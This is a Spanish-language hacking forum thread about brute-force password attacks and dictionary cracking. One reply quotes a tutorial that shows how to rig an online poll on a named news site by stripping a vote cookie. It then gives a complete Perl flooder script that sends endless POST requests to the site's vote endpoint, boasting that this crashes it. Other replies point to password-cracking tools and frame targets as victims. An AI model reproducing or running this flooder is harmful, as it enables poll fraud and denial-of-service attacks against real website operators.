Fuerza Bruta desde el Comienzo

hola gente vamos a hablar un poco de Fuerza Bruta:
Desde el comienzo En los sistemas, los administradores desearon limitar el acceso a determinados usuarios con autorización para acceder al mismo. Con el fin de bloquear el acceso a quienes no posean ésta autorización se crearon las contraseñas. Cada usuario posee ahora un username (nombre de usuario) y una contraseña. Cada vez que un usuario autorizado desea acceder al sistema debe introducir dichos datos, si los datos son reales el sistema le permite el acceso, sino de lo niega. Uno de los problemas en estos sistemas surge cuando un tercero consigue los datos de un usuario y los utiliza para acceder al sistema, su acceso será permitido sin importar si la persona no es quien dice decir ya que los datos son reales. Otro problema, es el que permite los ataques por fuerza bruta; Si el acceso ha sido denegado, en determinados sistemas se puede volver a intentar infinitas veces, igualmente a esta altura están surgiendo sistemas que no permiten mas de X intentos cada X minutos. Los ataques a través de fuerza bruta se aprovechan de sistemas que permiten infinitos intentos, los que a esta altura se los puede llamar…. “VULNERABLES”. Éstos ataques se basan en diccionarios y consisten en bombardear al sistema con nombres de usuarios y contraseñas aleatorios. Estos diccionarios se forman normalmente por archivos de extensión txt, uno para usuarios y otros para contraseñas. Hay que tener en cuenta que el número de posibilidades entre usuarios y contraseñas es demasiado alto, y por eso se utilizan diccionarios. Avanzando un poco más…. La única forma de que este ataque devuelva un usuario y una contraseña que nos permitan el acceso al sistema es que el usuario y la contraseña se encuentren en nuestros diccionarios. Hay usuarios que utilizan estos sistemas con el simple fin de cambiar la contraseña del usuario, ya que si a través de fuerza bruta es posible conocer sus datos, quiere decir que su usuario y contraseña son palabras existentes en los diccionarios de determinados idiomas y por lo tanto fáciles de descubrir, demostrándole al usuario que sus datos son débiles. Hablando de idioma, hay que tener en cuenta de donde es nuestra victima, ya que si ésta es de Rusia no nos serviría de nada utilizar un diccionario Español. Supongo que al leer esto, muchos los que conocían algo del tema están sorprendidos y creen que los ataques por fuerza bruta no sirven porque es muy difícil que su usuario y contraseña se encuentren en nuestros diccionarios, no se desesperen, en la red se encuentran diccionarios muy completos.
utiles aca esta el zip cracker.

Para ver los enlaces debes ser usuario Crear Usuario o Hacer Sesion

Para ver los enlaces debes ser usuario Crear Usuario o Hacer Sesion

Para ver los enlaces debes ser usuario Crear Usuario o Hacer Sesion

bueno en mi opinion la fuerza bruta se utiliza muy poco ya que para sacar una pass tardarias miles de años (eso si depende como sea el pass) tambien este tipo de ataques son muy detectados por los administradores.La forma mas correcta para mi seria con un buen diccionario,pero tambien hay que tener en cuenta la pass si la pass fuera "mariposa" tendriamos muchas posibilidades de consegirla pero si fuera "Mariposa302" no tendriamos ninguna posibilidad ya que se mezclan mayusculas minusculas y numeros.

Los programas de fuerza bruta pueden iniciar con una combinacion aleatoria, secuencial o basada en un diccionario que genralmente puedes bajar por ahi en forma de texto plano.

Puedes bajar una programa como este:

Webmaster Password Generator

Genera tantas contraseñas como quieras automáticamente
Como su propio nombre indica, esta utilidad te permite generar contraseñas de forma automática, tantas como quieras al mismo tiempo, siguiendo una serie de parámetros de configuración.

Incorpora una atractiva interfaz y es muy sencilla de usar; sólo tienes que marcar tus preferencias a la hora de crear las contraseñas (con mayúsculas o minúsculas, con números o con caracteres especiales, longitud de la clave, etc.) y hacer clic en el botón "Generate".

Descarga directa:
Para ver los enlaces debes ser usuario Crear Usuario o Hacer Sesion

me parece algo interesante pero no muy practico

Cita de: kobold666 en Mayo 05, 2008, 10:54:34

me parece algo interesante pero no muy practico

100% de acuerdo.

aunque si el sistema de fuerza bruta es parecido a los fllod (lo q pienso), porque es mas posble que generes un dos con tantas consultas, que encuentres la pass.

pasa en los sistemas cms q no tienen restricciones de intentos de acceso, muchas consultas y paff. cae sistema.

entonces si yo le iziera un ataque de fuerza bruta a un sistema CMS caeria en un DDos?

Cita de: OzX en Marzo 26, 2008, 01:36:36

- Analizando el Lado Oscuro de la auditoria Web, aveces queremos votar un sitio web, por distintas razones que estas sean, sin embargo la mayoria para no decir todos, empiezan a analizar la web en busca de las vulnes genericas, blog, foros, etc. CMS en general.

- Pero Aveces la solucion esta mucho mas Simple.

El maximo de daño desde lo mas simple

- Por ejemplo en Muchos Sitios Web se encuentran sistemas de Votaciones, y estas estan conectados a la base de datos,en donde la podemos afectar si la saturamos con multiples votaciones en muy pocos Segundos o en un tiempo prolongado.

Para Evitar Estos Tipos de "Saturaciones", Existen 2 Tipos de Restricciones (para votar mas de 1 vez):

Por Ej:

Votamos:

Ahora Analizamos las Cabezeras Http, Antes ,"en el acto" y Despues de Votar::
- Antes de Votar

Citar

Host:
Para ver los enlaces debes ser usuario Crear Usuario o Hacer Sesion

www.elcanillita.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11
Accept: application/x-shockwave-flash,text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: es-es,es;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive

En el Acto de Votar:

Citar

Host:
Para ver los enlaces debes ser usuario Crear Usuario o Hacer Sesion

www.elcanillita.com

Contenido Post:

Citar

radio=opcion2&url_back=%2Findex.php

Despues de Votar:

Citar

GET / HTTP/1.1
Host:
Para ver los enlaces debes ser usuario Crear Usuario o Hacer Sesion

www.elcanillita.com

Podemos Ver que Este Sistema Esta basado en el Registro de Cookies en Nuestro Navegador:

Cookie: PHPSESSID=26q3nmpv44trpf6t4kj2ro1hk5; voto=1

Podemos Ver como el Mismo Php nos Genera una cookie de nuestra session, y tambien nos registra el Voto, el cual dice claramente que ya vamos 1 vez.

y Tenemos el Contenido Post De la Votacion

Citar

radio=opcion2&url_back=%2Findex.php

Elige la Opcion 2 "Obama" (XD¡ Ek XD¡)

Ahora Modifiquemos Los Datos:

Citar

Cookie: PHPSESSID=26q3nmpv44trpf6t4kj2ro1hk5; voto=1

Si Borramos la Cookie o Tan Solo, Borramos "voto=1", podemos Volver a votar con el mismo contenido Post.

Votamos por Obama:
Antes:

Despues De Repetir los Datos Eliminando "vote=1"

Podemos Ver que Podemos Manipular la Votacion, si Nada Mas Modificamos el registro de la votacion que nos deja en la cookie de nuestro navegador:

Ahora Si Automatizamos Todo Esto?

Código:

use IO::Socket;
system ("cls");
#By OzX
print q(
##############################################
# Flooder Votaciones Post #
# by OzX #
# NB.Net Labs Tutorial Post & Get H-NeZ 2 #
##############################################
);

$server="www.elcanillita.com";
$path="/confirmavoto.php";
$post="radio=opcion2&url_back=%2Findex.php";

for ($x=1;$x<=9999999999999999999999999;$x++){

$largo_post = length $post;

my $socket = new IO::Socket::INET (
PeerAddr => "$server",
PeerPort => "80",
Proto => "tcp",
);
die "\n Error: $!\n" unless $socket;

print $socket "POST $path HTTP/1.1\n";
print $socket "Host: $server \n";
print $socket "Referer: $server\n";
print $socket "Accept-Language: en-us\n";
print $socket "Content-Type: application/x-www-form-urlencoded\n";
print $socket "Accept-Encoding: gzip, deflate\n";
print $socket "User-Agent: Mozilla/5.0 (BeOS; U; BeOS X.6; en-US;rv:1.7.Cool Gecko/20050511 Firefox/1.0.4\n";
print $socket "Connection: Keep-Alive\n";
print $socket "Cache-Control: no-cache\n";
print $socket "Content-Length: $largo_post\n\n";
print $socket "$post\n";
close($socket);
syswrite STDOUT, ".";
}

Y CraSh¡ D.o.S

Y dejamos la Votacion en Las Nubes.

OzX¡

Sacado de

Para ver los enlaces debes ser usuario Crear Usuario o Hacer Sesion

Saludos¡

Bueno me paso lo siguiendo utilizando un programa de fuerza bruta queria sacar el pass de un archivo comprimido en winrar me consegui un pograma de fueza fruta y me decia que tardaria 3 años -_- en mi opinion la fuerza bruta fue en minimas proporciones util pero ahora son minusculas las posibilidades.

Salu2

Cita de: SlayCool en Mayo 08, 2008, 07:31:52

claró pero no siempre por que como dije anteriormente puedes tardar años en consegir una pass pero ya depende de cual y tambien depende del crackeador que uses.

OzX buen aporte Wink

	Bienvenido(a), Visitante. Favor de ingresar o registrarse. ¿Perdiste tu email de activación? - Julio 26, 2008, 11:29:54 Boton Buscar